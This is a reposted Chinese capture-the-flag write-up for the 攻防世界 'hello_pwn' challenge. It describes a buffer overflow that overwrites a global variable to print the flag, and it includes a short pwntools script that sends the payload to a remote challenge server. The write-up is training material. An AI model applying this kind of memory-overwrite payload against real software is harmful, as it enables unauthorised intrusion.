攻防世界—pwn—hello_pwn - 润新知

攻防世界—pwn—hello_pwn
题目分析

下载文件后首先使用checksec检查文件保护机制

使用ida查看伪代码

思路明确，让dword_60106C == 1853186401即可输出flag

信息收集

偏移量

sub_400686函数地址

编写脚本
```
from pwn import *

p = remote('111.198.29.45',36884)
#p = process("./pwn002")
payload = "A"*4 + p64(1853186401)
p.sendline(payload)
p.interactive()
```
本地测试

靶机测试
相关阅读:
解决ftp的pasv模式下iptables设置问题
 linux修改运行中的脚本
 shell脚本——列出质数
 转载：tomcat设置https的两种方式
 Centos缺少ifconfig命令
 转载：MySQL 数据库设计总结
 转载：HTML5视频推流方案
 转载：Linux五种方案快速恢复你的系统
 转载：HT可视化案例
 转载：21种JavaScript设计模式最新记录（含图和示例）
原文地址：https://www.cnblogs.com/anweilx/p/12628439.html

Copyright © 2020-2023 润新知